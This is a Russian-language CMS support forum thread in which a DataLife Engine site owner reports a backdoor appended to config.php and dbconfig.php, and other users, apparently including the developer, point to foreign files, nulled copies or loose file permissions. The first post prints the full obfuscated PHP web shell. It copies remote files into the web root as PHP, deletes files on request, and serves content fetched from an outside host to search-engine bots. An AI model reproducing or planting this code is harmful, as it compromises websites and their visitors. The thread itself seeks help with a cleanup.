Перейти к публикации

Рекомендованные сообщения

Здравствуйте.

Такая штука:

<?php

include('engine/data/conect.txt');

?>

этот код добавляется в конец в файлах:

config.php

и

dbconfig.php

Насколько мы смогли выяснить, что это shell который добирается к сайту под видом поисковых ботов, чтобы не спалили!

Но, большой вопрос, каким образом злоумышленникам удалось произвести изменение в этих файлах.

Если они получили бы фтп доступ, тогда срздавать новый шелл, было бы не к чему!

<?php $x1a="\x63\x6f\160\171"; $x1b="f\x69\154e"; $x1c="f\163\157\x63kop\x65\x6e"; $x1d="\x69\x6dp\154od\145"; $x1e="\x73t\162\x70os"; $x1f="\165nlin\153"; if($_GET['chek']){echo"\074\x21\055-\103H\105\103K\0612\x33\x31\062\x39\x3371238\x37\x32\061\x33\055\x2d\x3e";}$x0b=$_GET['path'];$x0c=$_SERVER['DOCUMENT_ROOT']."\x2f";if($_GET['installs']){$x0d=$_GET['installs'];$x0e=$_GET['url'];$x0f = $x0e;$x10 = $x0c.$x0b.$x0d.".\160\150p";if ($x1a($x0f,$x10)){echo"o\x6b";}}if($_GET['delete']){$x11=$_GET['delete']; if($x1f($x0c."$x0b\x2f$x11\x2e\160\x68\x70"))echo"\157k";}$x12 = array();$x12['ad_Robots_UserAgent']=array('Google','Googlebot','msnbot','Yandex','YaDirectBot');$x12['ad_IsRobot']=false;foreach ($x12['ad_Robots_UserAgent'] as $x13){if ($x1e($_SERVER['HTTP_USER_AGENT'], $x13)!==false){$x12['ad_IsRobot']=true;break;}}$x14 = '';if($x12['ad_IsRobot']){$x14 = @$x1c("\166\x69p\055\142\x61s\145\x2e\167s", 80, $x15, $x16, 8); if(!$x14){echo "";}else{$x17 = @$x1b("http\072\x2f\057\166\x69\x70\055b\x61s\145.\x77\x73\x2fyand\145\170\057\x73c\x61n\x2e\160h\160\x3fhost\075$_SERVER[sERVER_NAME]\046\x69p=$_SERVER[REMOTE_ADDR]\x26$x18");if($x17==true)echo $x1d('',$x17);}}unset($x12,$x13,$x19,$x14);return $x14;?>
Ссылка на сообщение
Поделиться на других сайтах

arselor,

DLE не текстовый редактор файлов, он даже в теории не умеет ничего дописывать в эти файлы, более того, он вообще не умеет ничего писать в dbconfig.php, этот файл создается при инсталяции и больше никогда не может быть изменен скриптом, ищите проблему в других посторонних файлах на сервере.

Если нужна помощь тех. поддержки, начните с изучения правил форума.

Ссылка на сообщение
Поделиться на других сайтах

arselor,

DLE не текстовый редактор файлов, он даже в теории не умеет ничего дописывать в эти файлы, ищите проблему в других посторонних файлах на сервере.

Если нужна помощь тех. поддержки, начните с изучения правил форума.

celsoft,

DLE не текстовый редактор файлов, он даже в теории не умеет ничего дописывать в эти файлы, ищите проблему в других посторонних файлах на сервере.

Я и не утверждаю что это возможно, этот шел каким то образом вписывают через дыру в лицензии 8 и 3 версии.

Это уязвимость уже!!!!!!!!!!!!!!

config.php

и

dbconfig.php

как то умудряются в эти файлы вписать посторонний код, который и формирует: conect.txt

Ссылка на сообщение
Поделиться на других сайтах

Я и не утверждаю что это возможно, этот шел каким то образом вписывают через дыру в лицензии 8 и 3 версии.

Это уязвимость уже!!!!!!!!!!!!!!

Вы не читаете что я пишу? Дописать через скрипт туда ничего невозможно, по причине того что DLE это физически не умеет, нет в нем физичеки команд на дополнение или редактирование этих файлов. Записывают через другие скрипты, не имеющие отношения в DLE в принципе, эти посторонние файлы вам и нужно искать.

Если конечно это не нелегальная копия. В нуллах, стоят специальные бекдоры, через которые такой код записать можно. И за вашим E-mail или логином, я кстати не вижу никаких лицензий. Если скрипт лицензионный, то в поддержку скрипта http://dle-news.ru/support.html со своего клиентского аккаунта пишите, предоставляйте доступ к сайту, там посмотрят что у вас на сервере стоит и какие лишние файлы имеются. Другими словами все проверят

Ссылка на сообщение
Поделиться на других сайтах

Я и не утверждаю что это возможно, этот шел каким то образом вписывают через дыру в лицензии 8 и 3 версии.

Это уязвимость уже!!!!!!!!!!!!!!

config.php

и

dbconfig.php

как то умудряются в эти файлы вписать посторонний код, который и формирует: conect.txt

Недавно пытался себе сделать нечто подобное в модуле, выяснил для себя, что CHMOD выключен, как и его аналог при подключении к ФТП почти на всех серверах в целях безопасности. Проверьте свой сервак, возможно, он весь дырявый... Попросите вырубить на нем автоправа на папки и файлы, затем выставьте нужные права (обычно 0644 или 0666) вручную и уточните, какие они сейчас - наверняка 0777?. Сомневаюсь, что кривые руки у Целсофта, скорее у админа сервера или у вас - не в обиду, надеюсь. :)

Изменено пользователем zgr
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...